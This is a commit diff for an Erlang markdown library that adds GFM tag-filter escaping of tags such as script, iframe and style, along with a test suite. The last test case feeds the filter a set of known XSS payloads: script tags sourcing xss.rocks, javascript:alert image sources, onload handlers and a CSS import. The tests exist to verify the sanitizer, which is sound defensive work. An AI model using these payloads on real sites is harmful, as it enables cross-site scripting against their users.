Skip to content

Commit f261af8

Browse files
committed
Add gfm_tagfilter test suite (1 case still failing).
1 parent faa0a67 commit f261af8

File tree

5 files changed

+456
-3
lines changed

5 files changed

+456
-3
lines changed

apps/markdown/include/markdown_const.hrl

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2500,6 +2500,31 @@
25002500
%% [frontmatter]: crate::construct::frontmatter
25012501
-define(FRONTMATTER_SEQUENCE_SIZE, 3).
25022502

2503+
%% List of HTML tag names that are escaped by GFMs tag filter.
2504+
%%
2505+
%% Tag name matching must be performed insensitive to case, and thus this list
2506+
%% includes lowercase tag names.
2507+
%%
2508+
%% ## References
2509+
%%
2510+
%% * [*§ 6.1 Disallowed Raw HTML (extension)* in GFM](https://github.github.com/gfm/#disallowed-raw-html-extension-)
2511+
-define(GFM_HTML_TAGFILTER_NAMES, #{
2512+
<<"iframe">> => [],
2513+
<<"noembed">> => [],
2514+
<<"noframes">> => [],
2515+
<<"plaintext">> => [],
2516+
<<"script">> => [],
2517+
<<"style">> => [],
2518+
<<"textarea">> => [],
2519+
<<"title">> => [],
2520+
<<"xmp">> => []
2521+
}).
2522+
2523+
%% The number of the longest tag name in [`GFM_HTML_TAGFILTER_NAMES`][].
2524+
%%
2525+
%% This is currently the size of `plaintext`.
2526+
-define(GFM_HTML_TAGFILTER_SIZE_MAX, 9).
2527+
25032528
%% The number of preceding spaces needed for a [hard break
25042529
%% (trailing)][whitespace] to form.
25052530
%%

apps/markdown/include/markdown_util.hrl

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,10 @@
2626
-define('unreachable!'(Fmt, Args), erlang:error(unreachable, [?'format!'(Fmt, Args)])).
2727
-define('vec!'(List), markdown_vec:from_list(List)).
2828

29+
-define(is_ascii_alphabetic(X),
30+
(((X) >= $A) andalso ((X) =< $Z) orelse
31+
((X) >= $a) andalso ((X) =< $z))
32+
).
2933
-define(is_ascii_alphanumeric(X),
3034
(((X) >= $0) andalso ((X) =< $9) orelse
3135
((X) >= $A) andalso ((X) =< $Z) orelse

apps/markdown/src/util/markdown_util_gfm_tagfilter.erl

Lines changed: 91 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,6 +17,7 @@ Make dangerous HTML a tiny bit safer.
1717
-compile(warn_missing_spec_all).
1818
-oncall("whatsapp_clr").
1919

20+
-include_lib("markdown/include/markdown_const.hrl").
2021
-include_lib("markdown/include/markdown_parser.hrl").
2122
-include_lib("markdown/include/markdown_util.hrl").
2223
-include_lib("markdown/include/markdown_vec.hrl").
@@ -54,6 +55,93 @@ assert_eq!(gfm_tagfilter("<iframe>"), "&lt;iframe>");
5455
""".
5556
-spec gfm_tagfilter(Value) -> GfmTagfilteredValue when Value :: binary(), GfmTagfilteredValue :: binary().
5657
gfm_tagfilter(Value) when is_binary(Value) ->
57-
%% TODO: implement this
58-
GfmTagfilteredValue = Value,
59-
GfmTagfilteredValue.
58+
gfm_tagfilter_loop(Value, <<>>, 0, 0, byte_size(Value)).
59+
60+
%%%-----------------------------------------------------------------------------
61+
%%% Internal functions
62+
%%%-----------------------------------------------------------------------------
63+
64+
%% @private
65+
-spec find_tag_name_end(Bytes, NameStart, NameEnd, Len) -> NameEnd when
66+
Bytes :: binary(), NameStart :: non_neg_integer(), NameEnd :: non_neg_integer(), Len :: non_neg_integer().
67+
find_tag_name_end(Bytes, NameStart, NameEnd, Len) when
68+
NameEnd < Len andalso (NameEnd - NameStart) < ?GFM_HTML_TAGFILTER_SIZE_MAX
69+
->
70+
case binary:at(Bytes, NameEnd) of
71+
Char when ?is_ascii_alphabetic(Char) ->
72+
find_tag_name_end(Bytes, NameStart, NameEnd + 1, Len);
73+
_ ->
74+
NameEnd
75+
end;
76+
find_tag_name_end(_Bytes, _NameStart, NameEnd, _Len) ->
77+
NameEnd.
78+
79+
%% @private
80+
-spec gfm_tagfilter_loop(Bytes, Result, Index, Start, Len) -> Result when
81+
Bytes :: binary(),
82+
Result :: binary(),
83+
Index :: non_neg_integer(),
84+
Start :: non_neg_integer(),
85+
Len :: non_neg_integer().
86+
gfm_tagfilter_loop(Bytes, Result1, Index1, Start1, Len) when Index1 < Len ->
87+
case Bytes of
88+
<<$<, _/bytes>> ->
89+
%% Optional `/`.
90+
NameStart =
91+
case Bytes of
92+
<<$<, $/, _/bytes>> ->
93+
Index1 + 2;
94+
_ ->
95+
Index1 + 1
96+
end,
97+
%% Tag name.
98+
NameEnd = find_tag_name_end(Bytes, NameStart, NameStart, Len),
99+
%% Non-empty.
100+
{Result2, Start2} =
101+
case is_filtered_tag(Bytes, NameStart, NameEnd, Len) of
102+
true ->
103+
{
104+
<<Result1/bytes, (binary:part(Bytes, Start1, Index1 - Start1))/bytes, "&lt;"/utf8>>,
105+
Index1 + 1
106+
};
107+
false ->
108+
{Result1, Start1}
109+
end,
110+
%% There was no `<` before `name_end`, so move to that next.
111+
Index2 = NameEnd,
112+
gfm_tagfilter_loop(Bytes, Result2, Index2, Start2, Len);
113+
_ ->
114+
Index2 = Index1 + 1,
115+
gfm_tagfilter_loop(Bytes, Result1, Index2, Start1, Len)
116+
end;
117+
gfm_tagfilter_loop(Bytes, Result, _Index, Start, Len) ->
118+
<<Result/bytes, (binary:part(Bytes, Start, Len - Start))/bytes>>.
119+
120+
%% @private
121+
-spec is_filtered_tag(Bytes, NameStart, NameEnd, Len) -> boolean() when
122+
Bytes :: binary(), NameStart :: non_neg_integer(), NameEnd :: non_neg_integer(), Len :: non_neg_integer().
123+
is_filtered_tag(Bytes, NameStart, NameEnd, Len) ->
124+
case
125+
NameEnd =:= Len orelse
126+
(NameEnd =/= NameStart andalso is_html_whitespace_or_delimiter(binary:at(Bytes, NameEnd)))
127+
of
128+
true ->
129+
TagName = markdown_types:unicode_binary(
130+
string:casefold(binary:part(Bytes, NameStart, NameEnd - NameStart))
131+
),
132+
%% Known name.
133+
maps:is_key(TagName, ?GFM_HTML_TAGFILTER_NAMES);
134+
false ->
135+
false
136+
end.
137+
138+
-doc """
139+
HTML whitespace, closing slash, or closing angle bracket.
140+
""".
141+
-spec is_html_whitespace_or_delimiter(char()) -> boolean().
142+
is_html_whitespace_or_delimiter(C) when
143+
C =:= $\t orelse C =:= $\n orelse C =:= $\f orelse C =:= $\r orelse C =:= $\s orelse C =:= $/ orelse C =:= $>
144+
->
145+
true;
146+
is_html_whitespace_or_delimiter(_) ->
147+
false.
Lines changed: 191 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,191 @@
1+
%%% % DO NOT EDIT: this file was generated by 'just codegen'
2+
%%% % @generated SignedSource<<60159ac2f544d43788d7acc38b52a010>>
3+
%%% % @format
4+
%%%-----------------------------------------------------------------------------
5+
%%% Copyright (c) Meta Platforms, Inc. and affiliates.
6+
%%% Copyright (c) WhatsApp LLC
7+
%%%
8+
%%% This source code is licensed under the MIT license found in the
9+
%%% LICENSE.md file in the root directory of this source tree.
10+
%%%-----------------------------------------------------------------------------
11+
-module(markdown_gfm_tagfilter_SUITE).
12+
-moduledoc """
13+
14+
""".
15+
-moduledoc #{author => ["Andrew Bennett <[email protected]>"]}.
16+
-moduledoc #{created => "", modified => ""}.
17+
-moduledoc #{copyright => "Meta Platforms, Inc. and affiliates."}.
18+
-compile(warn_missing_spec_all).
19+
-oncall("whatsapp_clr").
20+
21+
-include_lib("markdown/include/markdown_mdast.hrl").
22+
-include_lib("markdown/include/markdown_util.hrl").
23+
-include_lib("stdlib/include/assert.hrl").
24+
25+
-behaviour(ct_suite).
26+
27+
%% ct_suite callbacks
28+
-export([
29+
all/0,
30+
groups/0,
31+
init_per_suite/1,
32+
end_per_suite/1,
33+
init_per_group/2,
34+
end_per_group/2
35+
]).
36+
37+
%% Test Cases
38+
-export([
39+
test_gfm_tagfilter_case_1/1,
40+
test_gfm_tagfilter_case_2/1,
41+
test_gfm_tagfilter_case_3/1,
42+
test_gfm_tagfilter_case_4/1,
43+
test_gfm_tagfilter_case_5/1,
44+
test_gfm_tagfilter_case_6/1
45+
]).
46+
47+
%%%=============================================================================
48+
%%% ct_suite callbacks
49+
%%%=============================================================================
50+
51+
-spec all() -> markdown_test:all().
52+
all() ->
53+
[
54+
{group, static}
55+
].
56+
57+
-spec groups() -> markdown_test:groups().
58+
groups() ->
59+
[
60+
{static, [parallel], [
61+
test_gfm_tagfilter_case_1,
62+
test_gfm_tagfilter_case_2,
63+
test_gfm_tagfilter_case_3,
64+
test_gfm_tagfilter_case_4,
65+
test_gfm_tagfilter_case_5,
66+
test_gfm_tagfilter_case_6
67+
]}
68+
].
69+
70+
-spec init_per_suite(Config :: ct_suite:ct_config()) -> markdown_test:init_per_suite().
71+
init_per_suite(Config) ->
72+
Config.
73+
74+
-spec end_per_suite(Config :: ct_suite:ct_config()) -> markdown_test:end_per_suite().
75+
end_per_suite(_Config) ->
76+
ok.
77+
78+
-spec init_per_group(GroupName :: ct_suite:ct_groupname(), Config :: ct_suite:ct_config()) ->
79+
markdown_test:init_per_group().
80+
init_per_group(_Group, Config) ->
81+
Config.
82+
83+
-spec end_per_group(GroupName :: ct_suite:ct_groupname(), Config :: ct_suite:ct_config()) ->
84+
markdown_test:end_per_group().
85+
end_per_group(_Group, _Config) ->
86+
ok.
87+
88+
%%%=============================================================================
89+
%%% Test Cases
90+
%%%=============================================================================
91+
92+
-spec test_gfm_tagfilter_case_1(Config) -> markdown_test:testcase() when
93+
Config :: ct_suite:ct_config().
94+
test_gfm_tagfilter_case_1(_Config) ->
95+
?assertMatch(
96+
{ok, <<"<iframe>"/utf8>>},
97+
markdown:to_html_with_options(
98+
<<"<iframe>"/utf8>>, markdown_options:default(#{compile => #{allow_dangerous_html => true}})
99+
),
100+
"should not filter by default"
101+
),
102+
ok.
103+
104+
-spec test_gfm_tagfilter_case_2(Config) -> markdown_test:testcase() when
105+
Config :: ct_suite:ct_config().
106+
test_gfm_tagfilter_case_2(_Config) ->
107+
?assertMatch(
108+
{ok, <<"<p>a &lt;i&gt;</p>\n&lt;script&gt;"/utf8>>},
109+
markdown:to_html_with_options(
110+
<<"a <i>\n<script>"/utf8>>, markdown_options:default(#{compile => #{gfm_tagfilter => true}})
111+
),
112+
"should not turn `allow_dangerous_html` on"
113+
),
114+
ok.
115+
116+
-spec test_gfm_tagfilter_case_3(Config) -> markdown_test:testcase() when
117+
Config :: ct_suite:ct_config().
118+
test_gfm_tagfilter_case_3(_Config) ->
119+
?assertMatch(
120+
{ok, <<"&lt;iframe>"/utf8>>},
121+
markdown:to_html_with_options(
122+
<<"<iframe>"/utf8>>,
123+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
124+
),
125+
"should filter"
126+
),
127+
ok.
128+
129+
-spec test_gfm_tagfilter_case_4(Config) -> markdown_test:testcase() when
130+
Config :: ct_suite:ct_config().
131+
test_gfm_tagfilter_case_4(_Config) ->
132+
?assertMatch(
133+
{ok, <<"&lt;iframe\n>"/utf8>>},
134+
markdown:to_html_with_options(
135+
<<"<iframe\n>"/utf8>>,
136+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
137+
),
138+
"should filter when followed by a line ending (1)"
139+
),
140+
ok.
141+
142+
-spec test_gfm_tagfilter_case_5(Config) -> markdown_test:testcase() when
143+
Config :: ct_suite:ct_config().
144+
test_gfm_tagfilter_case_5(_Config) ->
145+
?assertMatch(
146+
{ok, <<"<div\n>"/utf8>>},
147+
markdown:to_html_with_options(
148+
<<"<div\n>"/utf8>>,
149+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
150+
),
151+
"should filter when followed by a line ending (2)"
152+
),
153+
ok.
154+
155+
-spec test_gfm_tagfilter_case_6(Config) -> markdown_test:testcase() when
156+
Config :: ct_suite:ct_config().
157+
test_gfm_tagfilter_case_6(_Config) ->
158+
?assertMatch(
159+
{ok, <<"""
160+
&lt;title>
161+
<div title="&lt;title>"></div>
162+
<p><span title="&lt;title>"></span></p>
163+
<div>&lt;title>&lt;/title></div>
164+
<p><span>&lt;title>&lt;/title></span></p>
165+
<p><b>&lt;textarea>&lt;/textarea></b></p>
166+
<p>&lt;script/src=&quot;#&quot;&gt;</p>
167+
&lt;SCRIPT SRC=http://xss.rocks/xss.js>&lt;/SCRIPT>
168+
<IMG SRC="javascript:alert('XSS');">
169+
<p>&lt;IMG SRC=javascript:alert('XSS')&gt;</p>
170+
<p>&lt;IMG SRC=<code>javascript:alert(&quot;RSnake says, 'XSS'&quot;)</code>&gt;</p>
171+
<p>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT>alert(&quot;XSS&quot;)&lt;/SCRIPT>&quot;&gt;</p>
172+
<p>&lt;SCRIPT/XSS SRC=&quot;http://xss.rocks/xss.js&quot;&gt;&lt;/SCRIPT></p>
173+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
174+
<p>&lt;&lt;SCRIPT>alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT></p>
175+
&lt;SCRIPT SRC=http://xss.rocks/xss.js?< B >
176+
177+
&lt;SCRIPT SRC=//xss.rocks/.j>
178+
179+
&lt;/TITLE>&lt;SCRIPT>alert("XSS");&lt;/SCRIPT>
180+
&lt;STYLE>li {list-style-image: url("javascript:alert('XSS')");}&lt;/STYLE><UL><LI>XSS</br>
181+
<p>javascript:/<em>--&gt;&lt;/title>&lt;/style>&lt;/textarea>&lt;/script>&lt;/xmp>&lt;svg/onload='+/&quot;/+/onmouseover=1/+/[</em>/[]/+alert(1)//'&gt;</p>
182+
&lt;STYLE>@import'http://xss.rocks/xss.css';&lt;/STYLE>
183+
184+
"""/utf8>>},
185+
markdown:to_html_with_options(
186+
<<"\n<title>\n\n<div title=\"<title>\"></div>\n\n<span title=\"<title>\"></span>\n\n<div><title></title></div>\n\n<span><title></title></span>\n\n<b><textarea></textarea></b>\n\n<script/src=\"#\">\n\n<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n\n<IMG SRC=\"javascript:alert('XSS');\">\n\n<IMG SRC=javascript:alert('XSS')>\n\n<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>\n\n<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n\n<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>\n\n<SCRIPT SRC=http://xss.rocks/xss.js?< B >\n\n<SCRIPT SRC=//xss.rocks/.j>\n\n</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n\n<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n\njavascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>\n\n<STYLE>@import'http://xss.rocks/xss.css';</STYLE>\n"/utf8>>,
187+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
188+
),
189+
"should handle things like GitHub"
190+
),
191+
ok.

0 commit comments

Comments
 (0)